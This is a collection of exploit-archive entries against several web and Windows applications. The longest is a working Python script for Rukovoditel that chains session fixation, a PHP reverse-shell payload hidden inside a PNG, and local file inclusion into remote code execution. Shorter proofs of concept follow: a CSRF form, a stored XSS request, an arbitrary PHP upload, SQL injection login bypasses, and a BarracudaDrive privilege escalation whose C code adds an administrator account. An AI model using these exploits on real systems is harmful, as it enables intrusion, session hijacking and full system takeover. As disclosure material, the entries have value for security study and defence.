#!/usr/bin/python3 # Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated) # Exploit Author: @_danyx07 # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: Rukovoditel < 2.7 # Tested on: Debian 9 Rukovoditel 2.6.1 # CVE : CVE-2020-11819 # Description : This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile. # With the --type L option, this script will create a malicious link, if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content on their photo profile, and then use local file include (CVE-2020-11819) to get a nice reverse shell. # Or, with the options --type C -u <username> -p <password> you can provide credentials, load the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve the execution of code. # Protip: remember to check if the registration module is enabled ;) import sys import requests from bs4 import BeautifulSoup import re import base64 import argparse import os from shutil import copyfile import datetime import hashlib import socket import threading import time import random import uuid __version__ = '1.0' parser = argparse.ArgumentParser(description= "Post-authenticate RCE for rukovoditel, script version %s" % __version__, usage='\n %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n') parser.add_argument('-t', '--target', metavar='URL', type=str, required=True, help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/') parser.add_argument('-u', '--user', type=str, help='Username for authentication') parser.add_argument('-p', '--password', type=str, help='Password for authentication') parser.add_argument('-a', '--type', required=True, type=str, help='Use -a L to generate the link and steal the session or use -a C if you have access credentials to the web application') parser.add_argument('--ip', metavar="IP_ATTACKER", required=True, type=str, help='IP attacker for reverse shell!') parser.add_argument('--port', metavar="PORT_ATTACKER", required=True, type=str, help='Port for reverse shell connection') parser.add_argument('--proxy', metavar="PROXY", help='Setup http proxy for debbugin http://127.0.0.1:8080') args = parser.parse_args() # Global variables s = requests.Session() url = args.target user = args.user pwd = args.password typeAttack = args.type IP=args.ip PORT=args.port proxyDict = {"http" : args.proxy, "https" : args.proxy} csrf_token="" pht=None flag_access=False sid = uuid.uuid4().hex def serverShell(): server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) server_address = (IP,int(PORT)) server.bind((server_address)) server.listen(0) print("[+] Listening on %s:%s" % (IP,PORT)) conn,addr = server.accept() print("[+] Accepted connection from %s and port %s" % (addr[0],addr[1])) print("Type 'quit' for exit") server.settimeout(10) while True: cmd = input() if cmd == 'quit': print("[-] Closing connection with the shell") conn.close() server.close() break cmd = cmd + "\n" if len(str(cmd)) > 0: command = conn.send(cmd.encode('utf-8')) try: response = conn.recv(2048) print(response.decode('utf-8')) except server.timeout: print("Didn't receive data!") finally: server.close() conn.close() def authByCookie(): global flag_access global sid url_hijack = url+'index.php?sid='+sid url_in = url+"index.php?module=dashboard/" print("[+] Send this URL to the victim -> %s" % url_hijack) while True: if flag_access == True: break def checkAccess(stop): global flag_access time.sleep(3) while True: if typeAttack == 'L': s.cookies.clear() s.cookies.set('sid',sid) url_login = url+'index.php?module=users/account' r = s.get(url_login, proxies=proxyDict) response = r.text if response.find('account_form') != -1: print("[+] Access granted!") soup = BeautifulSoup(response, 'lxml') csrf_token = soup.find('input')['value'] flag_access=True else: print("[-] Waiting for access") if stop(): break time.sleep(3) return 0 def makeAuth(): url_login = url+'index.php?module=users/login&action=login' r = s.get(url_login, proxies=proxyDict) html = r.text soup = BeautifulSoup(html, 'lxml') csrf_token = soup.find('input')['value'] print("[+] Getting CSRF Token %s" % csrf_token ) auth = {'username':user, 'password':pwd, 'form_session_token':csrf_token} print("[+] Trying to authenticate with username %s" % user) r = s.post(url_login, data=auth, proxies=proxyDict) response = r.text if response.find("login_form") != -1: print("[-] Authentication failed... No match for Username and/or Password!") return -1 def createEvilFile(): rv = """ /*<?php /**/ unlink(__FILE__); @error_reporting(0); @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0); $dis=@ini_get('disable_functions'); if(!empty($dis)){ $dis=preg_replace('/[, ]+/', ',', $dis); $dis=explode(',', $dis); $dis=array_map('trim', $dis); }else{ $dis=array(); } $ipaddr='"""+IP+"""'; $port="""+PORT+"""; if(!function_exists('SsMEEaClAOR')){ function SsMEEaClAOR($c){ global $dis; if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\\n"; } $RhoVbBR='is_callable'; $vaVrJ='in_array'; if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){ $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); $o=NULL; while(!feof($pipes[1])){ $o.=fread($pipes[1],1024); } @proc_close($handle); }else if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){ $o=shell_exec($c); }else if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){ $o=array(); exec($c,$o); $o=join(chr(10),$o).chr(10); }else if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){ $fp=popen($c,'r'); $o=NULL; if(is_resource($fp)){ while(!feof($fp)){ $o.=fread($fp,1024); } } @pclose($fp); }else if($RhoVbBR('system')and!$vaVrJ('system',$dis)){ ob_start(); system($c); $o=ob_get_contents(); ob_end_clean(); }else if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){ ob_start(); passthru($c); $o=ob_get_contents(); ob_end_clean(); }else { $o=0; } return $o; } } $nofuncs='no exec functions'; if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ $s=@fsockopen("tcp://$ipaddr",$port); while($c=fread($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=SsMEEaClAOR(substr($c,0,-1)); if($out===false){ fwrite($s,$nofuncs); break; } } fwrite($s,$out); } fclose($s); }else{ $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); @socket_connect($s,$ipaddr,$port); @socket_write($s,"socket_create"); while($c=@socket_read($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=SsMEEaClAOR(substr($c,0,-1)); if($out===false){ @socket_write($s,$nofuncs); break; } } @socket_write($s,$out,strlen($out)); } @socket_close($s); } """ encoded_bytes = rv.encode('ascii') b64_bytes = base64.b64encode(encoded_bytes); payload = b64_bytes.decode('ascii') createImage() copyfile("./tux.png","/tmp/evil-tux.png") evilF = open('/tmp/evil-tux.png','a+') evilF.write("<?php eval(base64_decode(\""+payload+"\")); ?>") evilF.close() print("[+] Evil file created!") def searchFile(etime): cdate = etime for i in range(3600,52200,900): h1 = hashlib.sha1() img1 = str(cdate+i)+"_evil-tux.png" h1.update(img1.encode('utf-8')) r = requests.get(url+"uploads/users/"+h1.hexdigest()) if r.status_code == 200: print(r.text) return h1.hexdigest() h2 = hashlib.sha1() img2 = str(cdate-i)+"_evil-tux.png" h2.update(img2.encode('utf-8')) r = requests.get(url+"uploads/users/"+h2.hexdigest()) if r.status_code == 200: #print(r.text) return h2.hexdigest() i+1800 return "" def uploadFile(): global pht print("[+] Trying to upload evil file!...") form_data1 = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':'english.php'} files = {'fields[10]':open('/tmp/evil-tux.png','rb')} url_upload = url+'index.php?module=users/account&action=update' r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict) date = r.headers['Date'] etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s')) #reg = re.findall(r"([a-fA-F\d]{40})",r.text) reg = None if not reg: print("[-] The file name was not found in the response :(") fileUp = searchFile(etime) else: fileUp = reg[0] print("[+] Looking for the file name uploaded...") r = s.get(url+"/uploads/users/"+fileUp) if r.status_code!=200: print("[-] File name couldn't be found!") exit() pht="../../uploads/users/"+fileUp print("[+] String for path traversal is %s" % pht) def updateProfile(oplang="english.php"): if oplang == "english.php": print("[+] Updating profile with language %s " % oplang) payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''} files = {"":""} url_upload = url+'index.php?module=users/account&action=update' r = s.post(url_upload, files=files, data=payload, proxies=proxyDict) return 0 else: print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)") payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''} files = {"":""} url_upload = url+'index.php?module=users/account&action=update' r = s.post(url_upload, files=files, data=payload, proxies=proxyDict) serverShell() def createImage(): if os.path.exists("tux.png"): return imgb64 = "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" f = open("tux.png","wb") f.write(base64.b64decode(imgb64)) f.close() def main(): s.cookies.clear() stop_threads = False check_thread = threading.Thread(target=checkAccess, args =(lambda : stop_threads, )) check_thread.start() if typeAttack == "C": if makeAuth() == -1: stop_threads = True check_thread.join() print("[-] Exiting...") exit(0) elif typeAttack == "L": authByCookie() else: "[!] You must specify the type of attack with the -a option" exit() createEvilFile() uploadFile() updateProfile(pht) stop_threads = True check_thread.join() print("[+] Starting clean up...") updateProfile() os.remove("/tmp/evil-tux.png") print("[+] Exiting...") if __name__ == '__main__': main() s.cookies.clear() """try: main() s.cookies.clear() except Exception as e: print("[\033[91m!\033[0m] Error: %s" % e)"""

# Exploit Title: Stock Management System 1.0 - Cross-Site Request Forgery (Change Username) # Exploit Author: Bobby Cooke & Adeeb Shah (@hyd3sec) # CVE ID: N/A # Date: 2020-09-01 # Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # CWE-352: Cross-Site Request Forgery (CSRF) # CVSS Base Score: 5.9 | Impact Subscore: 4.2 | Exploitability Subscore: 1.6 # CVSS Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in 'changeUsername.php' webpage of SourceCodesters # Stock Management System v1.0 allows remote attackers to deny future logins via changing the # authenticated victims username when they visit a third-party site. # PoC - Form Method # Change <TARGET-HOST> to target IP address or hostname <html> <body> <form action="http://<TARGET-HOST>/stock/php_action/changeUsername.php" method="POST"> <input type="hidden" name="username" value="BOKU" /> <input type="hidden" name="user_id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting # Date: 2020-09-01 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://savsoftquiz.com/ # Software Link: https://savsoftquiz.com/web/demo.php # Version: 5.0 # Tested on: Windows 10/Kali Linux # Contact: https://www.linkedin.com/in/hemantsolo/ Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. Attack vector: This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: First Name, Last Name 1. Go to the registration page. 2. Fill all the details and put this payload in First and Last Name "<script>alert("OPPS")</script>" 3. Now go to the admin panel and the XSS will be triggered. POST /savsoftquiz_v5_enterprise/index.php/login/insert_user/ HTTP/1.1 Host: TARGET Connection: close Content-Length: 187 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://savsoftquiz.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://TARGET/savsoftquiz_v5_enterprise/index.php/login/registration/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: _ga=GA1.2.757300437.1598544895; _gid=GA1.2.1240991040.1598544895; ci_session=mm5q58p28e620n9im0imeildnvabkoeg email=hemantpatidar1337%40gmail.com&password=test&first_name=<script>alert("OPPS")</script>&last_name=<script>alert("OPPS")</script>&contact_no=0000000000&gid%5B%5D=1

# Exploit Title: SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated) # Date: 2020-09-02 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://sitemagic.org/ # Software Link: https://sitemagic.org/Download.html # Version: 4.4.2 # Tested on: Ubuntu 18.04 # CVE : N/A # PoC: https://github.com/V1n1v131r4/Unrestricted-File-Upload-on-SiteMagic-CMS-4.4.2/blob/master/README.md Step 1 - Request POST /sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1 Host: example.org User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-BR,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------144837887339078243581158835832 Content-Length: 538 Origin: example.org DNT: 1 Connection: close Referer: http://example.org/sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages Cookie: timezone=America/Argentina/Buenos_Aires; cookieconsent_status=dismiss; SMSESSION407f70d0a9400582=f93d614ad0046ec76e41f3613d97da59 Upgrade-Insecure-Requests: 1 -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="info.php" Content-Type: application/x-php <?php phpinfo(); ?> -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMPostBackControl" -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMRequestToken" f9f116f33c012ce5e67f52dffc7e6bc6 -----------------------------144837887339078243581158835832-- Step 2 - Response Status 200 OK Version HTTP/1.1 Transferred 26,20 KB (25,80 KB size) Referrer Policy no-referrer-when-downgrade Step 3 - Read file uploaded http://example.org/sitemagic/files/images/info.php

# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass # Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku) # CVE ID: CVE-2020-24193 # Date: September 2, 2020 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Vulnerable Source Code if(isset($_POST['login'])) { $email=$_POST['email']; $password=md5($_POST['password']); $query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' "); $ret=mysqli_fetch_array($query); if($ret>0){ $_SESSION['detsuid']=$ret['ID']; header('location:dashboard.php'); } else{ $msg="Invalid Details."; } } ?> # Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1 POST /dets/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.65.130/dets/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 48 DNT: 1 Connection: close Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s Upgrade-Insecure-Requests: 1 email='+or+1%3d1+--+hyd3sec&password=badPass&login=login

# Exploit Title: BloodX CMS 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-09-02 # Exploit Author: BKpatron # Vendor Homepage: https://github.com/diveshlunker/BloodX # Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/BloodX-master/login.php POST /BloodX-master/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 63 Referer: http:/localhost/BloodX-master/login.php Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht Connection: keep-alive Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

# Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # CVE ID: N/A # Date: 2020-09-01 # Vendor Homepage: https://barracudaserver.com/ # Software Link: https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html # Version: v6.5 # Tested On: Windows 10 Pro # CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0 # CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H # CWE-276: Incorrect Default Permissions # CWE-732: Incorrect Permission Assignment for Critical Resource # Vulnerability Description: # Insecure Service File Permissions in bd service in Real Time Logics BarracudaDrive v6.5 # allows local low-privilege attacker to escalate privileges to admin via replacing the bd.exe # file and restarting the computer where the malicious code will be executed as 'LocalSystem' # on the next startup. ## Insecure Folder Permission C:\>cacls C:\bd C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C ## Insecure File/Service Permission C:\>cacls C:\bd\bd.exe C:\bd\bd.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>sc qc bd [SC] QueryServiceConfig SUCCESS SERVICE_NAME: bd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\bd\bd.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BarracudaDrive ( bd ) service DEPENDENCIES : Tcpip SERVICE_START_NAME : LocalSystem ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name C:\bd>whoami desktop\lowpriv C:\bd>move bd.exe bd.service.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user boku mypassword /add"); system("net localgroup Administrators boku /add"); WinExec("C:\\bd\\bd.service.exe",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe #4. Transfer created 'bd.exe' to the Windows Host #5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder C:\bd>move C:\Users\lowpriv\Downloads\bd.exe . #6. Check that exploit admin user doesn't exit C:\bd>net user boku The user name could not be found #6. Reboot the Computer C:\bd>shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full" User name boku Local Group Memberships *Administrators *Users Global Group memberships *None